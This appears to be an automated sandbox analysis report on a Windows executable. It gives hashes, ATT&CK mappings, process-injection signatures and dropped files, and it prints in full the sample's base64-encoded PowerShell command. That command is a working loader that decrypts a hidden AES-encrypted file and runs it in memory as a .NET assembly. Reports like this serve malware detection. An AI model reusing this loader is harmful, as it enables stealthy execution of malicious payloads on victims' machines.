230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a

General

Target

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
Size

1.0MB
MD5

0bfde25a39f983c58a94d6ad2d95181e
SHA1

020285c7a771bb2f5e81badf92b558ae97932348
SHA256

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a
SHA512

a864bdbfcdb55f6f574ca37a7d57a43ce382044dffc5eca7f1e87f79a97776f4fb9e9b984a4ad001ca4aa1fb851f45531fb22d2a0b62f4fb157a42bbe6152bc0
SSDEEP

24576:a/rEUhxLdtH9iIFaqo8kVG8QBi2oMnWldVvyKy:azvdcIFaG8//MUyf

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2616 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2616 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2616 powershell.exe

pid	process
2616	powershell.exe

pid	process
2616	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2616	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe

description	pid	process	target process
PID 1944 wrote to memory of 2616	1944	230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe	powershell.exe
PID 1944 wrote to memory of 2616	1944	230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe	powershell.exe
PID 1944 wrote to memory of 2616	1944	230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe
"C:\Users\Admin\AppData\Local\Temp\230cdd39e3e80f708c62b9742f83bca9345b0c49732b067633b8409e248bde0a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEIAMwAsACAAMAB4ADkAMAAsACAAMAB4ADYARgAsACAAMAB4AEEAMAAsACAAMAB4AEQAOAAsACAAMAB4ADYAMwAsACAAMAB4AEQAMgAsACAAMAB4AEEANgAsACAAMAB4AEUAMwAsACAAMAB4ADQARAAsACAAMAB4ADYANwAsACAAMAB4AEYANwAsACAAMAB4ADUAMAAsACAAMAB4ADUAOQAsACAAMAB4ADYANAAsACAAMAB4AEYAMgAsACAAMAB4ADEANQAsACAAMAB4ADYAOAAsACAAMAB4ADgARgAsACAAMAB4AEUANQAsACAAMAB4AEYAMwAsACAAMAB4AEEANQAsACAAMAB4AEEAMQAsACAAMAB4ADcAMwAsACAAMAB4ADEARgAsACAAMAB4ADYAQgAsACAAMAB4ADMAMgAsACAAMAB4ADIANgAsACAAMAB4ADgARgAsACAAMAB4ADIARQAsACAAMAB4ADMAOAAsACAAMAB4ADUANgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA5ADQALAAgADAAeABGAEYALAAgADAAeABBADEALAAgADAAeAA0ADQALAAgADAAeAA4AEEALAAgADAAeAA3AEUALAAgADAAeABGADcALAAgADAAeAA5AEEALAAgADAAeABDADIALAAgADAAeAAzADgALAAgADAAeAAyAEUALAAgADAAeABGADEALAAgADAAeAA0ADYALAAgADAAeABFAEUALAAgADAAeABGAEEALAAgADAAeAAwAEMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-29146.putik

Filesize
33KB

MD5
10f97ef3f035d5b8a83f74f0c3633797

SHA1
abd9f893e205fbbad8184e513d06e67a9642f651

SHA256
9702e4ea1ca9407c311a92252091f65f022a59c9261d712ab127ea667d331dc6

SHA512
5f7e69ace5466b60ddc0377651ab43790a321578bb015d014b2f753dcfeb9d2a88501ff5e2b6e6383fcf3f296c178ec74aef23dabe46ef75bc7b27431f8c2f2d

Download Submit
memory/2616-5-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2616-6-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2616-7-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2616-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2616-10-0x0000000002AE0000-0x0000000002AEC000-memory.dmp

Filesize
48KB

Download
memory/2616-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing